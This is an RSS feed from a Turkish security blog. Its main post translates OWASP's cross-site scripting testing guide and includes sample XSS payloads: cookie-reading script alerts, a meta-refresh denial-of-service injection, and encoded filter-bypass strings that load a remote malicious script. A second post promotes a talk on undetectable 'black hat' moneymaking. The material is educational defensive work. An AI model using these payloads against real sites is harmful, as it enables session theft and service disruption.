<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jeremiah Grossman &#8211; BARAKLIların BT Blogu</title>
	<atom:link href="http://www.barakli.net/tag/jeremiah-grossman/feed" rel="self" type="application/rss+xml" />
	<link>https://www.barakli.net</link>
	<description>Yazılım, Güvenlik ve Teknoloji Blogu</description>
	<lastBuildDate>Tue, 20 Jul 2010 16:40:54 +0000</lastBuildDate>
	<language>tr</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>
<site xmlns="com-wordpress:feed-additions:1">21815451</site>	<item>
		<title>Cross Site Scripting(XSS) Testi</title>
		<link>https://www.barakli.net/cross-site-scriptingxss-testi.html</link>
					<comments>https://www.barakli.net/cross-site-scriptingxss-testi.html#respond</comments>
		
		<dc:creator><![CDATA[Serdar]]></dc:creator>
		<pubDate>Tue, 20 Jul 2010 15:55:02 +0000</pubDate>
				<category><![CDATA[Güvenlik]]></category>
		<category><![CDATA[cookie]]></category>
		<category><![CDATA[Dom-based]]></category>
		<category><![CDATA[Jeremiah Grossman]]></category>
		<category><![CDATA[session]]></category>
		<category><![CDATA[vbscript]]></category>
		<category><![CDATA[xss]]></category>
		<guid isPermaLink="false">http://www.barakli.net/?p=134</guid>

					<description><![CDATA[XSS saldırıları, tarayıcıdaki çeşitli kod çeviricilerine ve çalıştırıcılarına kod ilavesine dayanır. Bu saldırılar; HTML, Javascript, VBScript, ActiveX, Flash ve diğer programlama dilleri kullanılarak gerçekleştirilebilir. Hesap çalma, kullanıcı ayarlarında değişiklik yapabilme, cookie hırsızlığı gibi şeyler bu yöntemle mümkün olabilmektedir. Bazı durumlarda Cross Site Scripting açıkları, diğer web güvenlik açıklarının taranması ve servis kullanımını engelleme gibi başka fonksiyonları da gerçekleştirebilir.]]></description>
										<content:encoded><![CDATA[<p style="text-align: justify;"><!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 		A:link { color: #0000ff; so-language: en-US } --><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">XSS saldırıları, tarayıcıdaki çeşitli kod çeviricilerine ve çalıştırıcılarına kod ilavesine dayanır. Bu saldırılar; HTML, Javascript, VBScript, ActiveX, Flash ve diğer programlama dilleri kullanılarak gerçekleştirilebilir. Hesap çalma, kullanıcı ayarlarında değişiklik yapabilme, cookie hırsızlığı gibi şeyler bu yöntemle mümkün olabilmektedir. Bazı durumlarda Cross Site Scripting açıkları, diğer web güvenlik açıklarının taranması ve servis kullanımını engelleme gibi başka fonksiyonları da gerçekleştirebilir.</span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Cross Site Scripting, belirli bir web sitesindeki müşterilerin kişisel gizliliklerinin hedef alındığı ve müşterilerin bilgilerinin çalındığı veya çeşitli şekilde manipüle edildiği zaman ortaya çıkan güvenlik ihlaline dayanan bir saldırı yöntemidir. “Saldırgan &#8211; web site” veya “saldırgan &#8211; kurban” ilişkisi gibi iki aşamalı olan birçok web saldırı yönteminden farklı olarak XSS açıkları; 3 bileşenle gerçekleştirilir: saldırgan, kurban ve web site. XSS saldırılarının amacı, kurban müşterinin cookielerini veya diğer önemli bilgilerini çalmaktır. Böylece aynı kurban adına her türlü işlemi gerçekleştirebilir.</span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><span id="more-134"></span></span><span style="font-size: small;">Çevrimiçi mesajlaşma boardları, web logları, ziyaretçi defteri ve forumlar gibi mesajların kalıcı olarak depolandığı yerler de, Cross Site Scripting açığını kolaylaştırmaktadır. Bu durumlarda saldırgan, foruma, görünüşte tamamen zararsız olan bir siteye ait; fakat kullanıcıları hedef alacak şekilde şifrelenmiş bir script içeren herhangi link atabilir. Saldırganlar; zararlı scripti gizleyecek ve bazı durumlarda da &lt;Script&gt; tagının aleni kullanımını önleyecek çeşitli şifreleme yöntemlerine sahiptirler. XSS atakları genellikle zararlı javascript kodlarının kullanımı ile gerçekleştirilse de çalıştırılabilir herhangi bir içerikle de gerçekleştirilebilir. Her ne kadar bir çok tip karmaşık saldırı çeşidi olsa da XSS açıklarını tespit etmenin belli yöntemleri vardır.</span></span></p>
<p style="text-align: justify;"><span style="color: #dc2300;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><strong>3 tip XSS tipini görelim: Depolanmış(Gizli), Yansıtılmış(Aktive olmuş) ve DOM-Tabanlı</strong></span></span></span></p>
<p style="text-align: justify;"><span style="color: #ffff00;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><strong>Depolanmış XSS açığı</strong></span></span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><span style="color: #ffff00;">,</span> bu saldırı türünün en güçlü örneğidir. Depolanmış XSS saldırısı; herhangi bir kullanıcı tarafından bir web uygulamasına ilk olarak bilgi girildikten sonra bu bilginin veritabanı, dosya sistemi veya diğer bölümlerde yani genel olarak server üzerinde depolanmasının ardından, bu bilginin şifrelenmemiş bir şekilde kullanıcılara gösterilmesi sonucu açığa çıkar. Gerçek yaşamdan örnek verirsek, Ekim 2005&#8217;te MySpace&#8217;te ortaya çıkan Samy solucanı, XSS açığını kullanıyordu.</span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Bu açıklar, XSS açığının en önemli tipini oluşturur. Çünkü saldırgan, scripti bir kereye mahsus enjekte edebilir. Sosyal mühendisliği yardımıyla da birçok kullanıcı bu olaydan etkilenebilir veya web uygulaması XSS virüsüne bile maruz kalabilir.</span></span></p>
<p style="text-align: justify;"><span style="color: #ff0000;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><strong>Örnek:</strong></span></span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Elimizde, diğer kullanıcılara mesaj atmamızı sağlayan bir site olsun ve biz mesaj atmak yerine bir script enjekte edelim:</span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><img fetchpriority="high" decoding="async" class="alignnone" title="Resim 1" src="http://img844.imageshack.us/img844/7623/xssstored1.png" alt="" width="618" height="383" /><br />
</span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Şimdi server, bu bilgiyi depolayacak ve karşı taraftaki kullanıcı bu linke tıklayınca fake mesaj görünecek. Kurbanımızın tarayıcısı bizim scriptimizi aşağıdaki gibi çalıştıracak:</span></span></p>
<p style="text-align: justify;"><img decoding="async" class="alignnone" title="Resim 2" src="http://img821.imageshack.us/img821/7789/xssstored2.png" alt="" width="600" height="374" /></p>
<p style="text-align: justify;"><span style="color: #ffff00;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><strong>Yansıtılmış XSS açıkları</strong></span></span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"> ise çok daha fazla bilinen bir tiptir. Önceden veri girilmiş olan web istemcisinin, server-side(server aracılı) scriptlerle kullanılması sonucu ortaya çıkar. Eğer, kullanıcı tarafından girilen fakat onaylanmamış bilgiler; HTML kodlamasız olarak sayfada görülüyorsa; bu, client-side(istemci aracılı örn: tarayıcı kullanarak) kodların dinamik sayfalara eklenmesine izin verecektir. Bunun klasik örneği sitelerin arama bölümleri: Eğer bazı özel HTML karakterlerini de içeren karakter dizisini aratırsak, karşımıza neyi aradığımızı gösteren bir sonuç çıkacaktır. Eğer tüm arama kriterlerimiz veya karakterlerimiz; HTML kodlama ile görüntülenmezse, XSS açığı vardır diyebiliriz.</span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">İlk bakışta, eğer kullanıcılar kendi sayfalarına sadece kod ekleyebiliyorlarsa, bu ciddi bir problem değildir diye düşünebiliriz. Fakat, basit bir sosyal mühendislik metoduyla saldırgan kurbana bir link gönderir. Bu link sonuç sayfasına kodlar enjekte edilmiş zararlı bir linktir ve saldırganın sayfadaki tüm içeriğe erişebilmesine olanak sağlar. Bu durumda kullanılması gereken sosyal mühendislik metodlarının genel gereksinimleri sebebiyle, bir çok programcı bu açıklara pek önem vermemiştir. Bu önemsenmeyen açıklardan biri de XSS&#8217;dir ve XSS&#8217;nin önemiyle ilgili hep anlaşmazlıklar olmuştur. XSS açığının önemini göstermek için en basit yol, DoS ataklarıdır. Bazı durumlarda aşağıdaki yöntem kullanılarak server üzerinde DoS atağı gerçekleştirilebilir.</span></span></p>
<pre style="text-align: justify;"><span style="color: #00ccff;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">article.php?title=&lt;meta%20http-equiv="refresh"%20content="0;"&gt;</span></span></span></pre>
<p style="text-align: justify;">
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Bu kod, hedef sayfa üzerinde her 0.3 saniyede bir sayfanın yenilenmesi isteğini gönderecektir. Bu sınırsız yenilenme isteklerinin meydana getirdiği flood sebebiyle, web sayfasının ve veri tabanı serverının işlemesi duracaktır. Daha fazla tarayıcı oturumunun olması bu saldırının şiddetini artıracaktır.</span></span></p>
<p style="text-align: justify;"><span style="color: #ffff00;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><strong>DOM-Tabanlı XSS problemi</strong></span></span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"> ise, bir sayfanın client-side(istemci tabanlı örn: tarayıcı kullanarak) scriptinde kendiliğinden olur. Elimizdeki bir javascript, herhangi bir bağlantı(link) istek parametresine(Örn: rss feed) erişirse ve kendi sayfasına bazı HTML kodları yazmasını sağlamak için bu bilgileri kullanırsa; bu bilgiler HTML kullanılarak kodlanmaz. Önceden yazılmış olan bu veri ve buna ek olarak bazı istemci tabanlı scriptler de içerebilen HTML kodu olarak tarayıcı tarafından yeniden yorumlanır. Bu açık türü, Yansıtılmış XSS açığına çok benzeyebilir; fakat bir önemli durum hariç:</span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Örneğin, eğer açığı olan bir siteye ait link içeren zararlı bir siteye sahip olan saldırgan, script enjekte edebilir ve bu script kullanıcının tarayıcısında çalıştırılabilir. Bu olay, XSS exploitleriyle normalde zaten bypassa uğrayan çapraz domain sınırlaması da dahil, tüm istemci tabanlı kodları bypass edecektir.</span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Bu enjeksiyonların birçok metodu vardır. Basit sitelerdeki kullanımının dışında bir organizasyonu nasıl etkilediğini gösteren bir örnek verecek olursak, BlackHat Amerika 2006 da Jeremiah Grossman tarafından gösterilen olayı söyleyebiliriz. Bu ispatlama yapılırken çeşitli bloglara, gazetelere veya web sayfaların yorum kısmına depolanmış XSS scripti içeren kodlar gönderilmiştir ve bu zararlı kodların bulunduğu sayfaları ziyaret eden kullanıcıların ağları belirli açıklara karşı taranabilmiş ve loglanmıştır.</span></span></p>
<p style="text-align: justify;"><span style="color: #ff0000;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><strong>Black Box testi ve örnek:</strong></span></span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">XSS açığını test etmenin yolu; bir uygulamanın veya web serverın, herhangi bir tarayıcı tarafından çalıştırılabilen basit scriptler içeren isteklere karşı vereceği cevabı doğrulamakla olur. Örneğin Sambar Server v5.3, XSS açığının bilindiği çok popüler ücretsiz bir web serverdır. Servera aşağıdaki gibi bir istek gönderirsek, tarayıcı tarafından çalıştırılan bir server cevabı alırız.</span></span></p>
<pre style="text-align: justify;"><span style="color: #00ccff;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><a href="http://server/cgi-bin/testcgi.exe?">http://server/cgi-bin/testcgi.exe?</a></span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">&lt;SCRIPT&gt;alert(“Cookie”+document.cookie)&lt;/SCRIPT&gt;</span></span></span></pre>
<p style="text-align: justify;">
<p style="text-align: justify;">
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Bu script tarayıcı tarafından çalıştırılacaktır çünkü uygulama, orijinal scripti içeren bir hata mesajı verecektir. Böylece tarayıcı bu cevabı, serverdan kaynaklanan çalıştırılabilir bir script olarak yorumlayacaktır. Tüm web serverlar ve web uygulamaları potansiyel olarak bu açıklara karşı zayıftır ve bu ataklara karşı önlem almak oldukça zordur.</span></span><span style="color: #ff0000;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><strong> </strong></span></span></span></p>
<p style="text-align: justify;"><span style="color: #ff0000;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><strong>Örnek 1:</strong></span></span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"> </span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Javascript büyük harf/küçük harf duyarlılığına sahip olduğundan bu yana bazı kişiler XSS ye karşı önlem almak için tüm karakterleri büyük harfe dönüştürmüşlerdir. Eğer böyle bir şey düşünüyorsanız harf duyarlılığına sahip olmayan bir dil olan VBScript&#8217;i kullanabilirsiniz.</span></span><span style="color: #00ff00;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"> </span></span></span></p>
<p style="text-align: justify;"><span style="color: #00ff00;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">JavaScript:</span></span></span><span style="color: #00ccff;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"> </span></span></span></p>
<p style="text-align: justify;"><span style="color: #00ccff;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">&lt;script&gt;alert(document.cookie);&lt;/script&gt;</span></span></span><span style="color: #00ff00;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"> </span></span></span></p>
<p style="text-align: justify;"><span style="color: #00ff00;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">VBScript:</span></span></span></p>
<p style="text-align: justify;"><span style="color: #00ffff;">&lt;script type=&#8221;text/vbscript&#8221;&gt;alert(DOCUMENT.COOKIE)&lt;/script&gt;</span><span style="color: #ff0000;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"> </span></span></span></p>
<p style="text-align: justify;"><span style="color: #ff0000;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><strong>Örnek 2:</strong></span></span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">Eğer sitesini XSS&#8217;ye karşı korumak isteyenler “&lt;”, “&lt;script”, “&lt;/script&gt;” gibi karakterlere karşı önlem almışlarsa çeşitli şifreleme yolları deneyebilirsiniz.</span></span></p>
<pre style="text-align: justify;"><span style="color: #00ccff;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">&lt;script src=</span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><a href="http://www.example.com/malicious-code.js">http://www.example.com/malicious-code.js</a></span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">&gt;&lt;/script&gt;</span></span></span>
<span style="color: #00ccff;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">%3cscript src=</span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><a href="http://www.example.com/malicious-code.js%3e%3c/script%3e">http://www.example.com/malicious-code.js%3e%3c/script%3e</a></span></span></span>
<span style="color: #00ccff;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;">\x3cscript src=</span></span><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><a href="http://www.example.com/malicious-code.js\x3e\x3c/script\x3e">http://www.example.com/malicious-code.js\x3e\x3c/script\x3e</a></span></span></span></pre>
<p><a style="margin: 12px auto 6px auto; font-family: Helvetica,Arial,Sans-serif; font-style: normal; font-variant: normal; font-weight: normal; font-size: 14px; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none; display: block; text-decoration: underline;" title="View Cross Site Scripting Testi on Scribd" href="http://www.scribd.com/doc/34593174/Cross-Site-Scripting-Testi">Cross Site Scripting Testi</a> <object id="doc_113205711488433" style="outline: none;" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="100%" height="500" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="name" value="doc_113205711488433" /><param name="data" value="http://d1.scribdassets.com/ScribdViewer.swf" /><param name="wmode" value="opaque" /><param name="bgcolor" value="#ffffff" /><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="document_id=34593174&amp;access_key=key-2gfefqt9qv9e2u3v4bbu&amp;page=1&amp;viewMode=list" /><param name="src" value="http://d1.scribdassets.com/ScribdViewer.swf" /><param name="allowfullscreen" value="true" /></object></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><span style="color: #ff6600;">Kaynak:</span> <a href="http://www.owasp.org/index.php/Testing_for_Cross_site_scripting">http://www.owasp.org/index.php/Testing_for_Cross_site_scripting</a></span></span></p>
<p style="text-align: justify;"><span style="font-family: Times New Roman,serif;"><span style="font-size: small;"><span style="color: #ff6600;">Çeviri:</span> Serdar BARAKLI<br />
</span></span></p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.barakli.net/cross-site-scriptingxss-testi.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">134</post-id>	</item>
		<item>
		<title>Web Üzerinde Para Kazanmak(Black Hat Ways)</title>
		<link>https://www.barakli.net/web-uzerinde-para-kazanmakblack-hat-ways.html</link>
					<comments>https://www.barakli.net/web-uzerinde-para-kazanmakblack-hat-ways.html#respond</comments>
		
		<dc:creator><![CDATA[Serdar]]></dc:creator>
		<pubDate>Sun, 06 Dec 2009 11:20:21 +0000</pubDate>
				<category><![CDATA[Güvenlik]]></category>
		<category><![CDATA[Jeremiah Grossman]]></category>
		<guid isPermaLink="false">http://www.barakli.net/?p=24</guid>

					<description><![CDATA[Aşağıdaki videoda; WhiteHat Security kurucusu Jeremiah Grossman ve WhiteHat Security direktörü Trey Ford tarafından yapılan bir sunumu izleyeceksiniz. Eğer Web üzerinde sessizce ve hile yollarını kullanarak ciddi paralar kazanmak istiyorsanız, Cross-Site Scripting(XSS) veya SQL Injection atakları yapmanıza gerek yok. Tüm ihtiyacınız olan şey; bir Web tarayıcı, neyi aradığınıza bağlı olarak birkaç ipucu ve biraz da siyah şapkalı hacker hileleri. Yapılacak olan bu iş, teknik bakımdan illegal değil; yalnızca servis koşullarını ihlâl etmek kapsamına girer. Bu şartlar altında kulağa çok akademik ve iyi niyetli olarak gelebilir; ama bunlar herkesin bildiği eski Web atak tekniklerine benzemez. Çünkü bir sistemle uğraşmak ve para ]]></description>
										<content:encoded><![CDATA[<p>Aşağıdaki videoda; WhiteHat Security kurucusu Jeremiah Grossman ve WhiteHat Security direktörü Trey Ford tarafından yapılan bir sunumu izleyeceksiniz.</p>
<p>Eğer Web üzerinde sessizce ve hile yollarını kullanarak ciddi paralar kazanmak istiyorsanız, Cross-Site Scripting(XSS) veya SQL Injection atakları yapmanıza gerek yok. Tüm ihtiyacınız olan şey; bir Web tarayıcı, neyi aradığınıza bağlı olarak birkaç ipucu ve biraz da siyah şapkalı hacker hileleri.</p>
<p>Yapılacak olan bu iş, teknik bakımdan illegal değil; yalnızca servis koşullarını ihlâl etmek kapsamına girer. Bu şartlar altında kulağa çok akademik ve iyi niyetli olarak gelebilir; ama bunlar herkesin bildiği eski Web atak tekniklerine benzemez. Çünkü bir sistemle uğraşmak ve para kazanmak bu kadar kolay olmayabilir. Bunların yanında da Plus IDS bu atakları tespit edemeyebilir ve Web uygulamalarının güvenlik duvarları onları bloklayamayabilir. Bu yüzden bu tip atakların tespit edilebilmesi çok da zordur. Artık videoya geçelim ve nelerin mümkün olabileceğini görelim.</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="570" height="350" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/SIMF8bp5-qg&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /></object></p>
<p><span style="color: #ff6600;"><strong>Kaynak:</strong></span> <a href="http://www.net-security.org/secworld.php?id=7177" target="_blank">http://www.net-security.org/secworld.php?id=7177</a><br />
<span style="color: #ff6600;"><strong>Çeviri:</strong></span> Serdar BARAKLI</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.barakli.net/web-uzerinde-para-kazanmakblack-hat-ways.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">24</post-id>	</item>
	</channel>
</rss>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/?utm_source=w3tc&utm_medium=footer_comment&utm_campaign=free_plugin

Page Caching using Disk: Enhanced 
Lazy Loading (feed)
Database Caching 29/45 queries in 0.020 seconds using Disk

Served from: www.barakli.net @ 2026-06-02 15:32:20 by W3 Total Cache
-->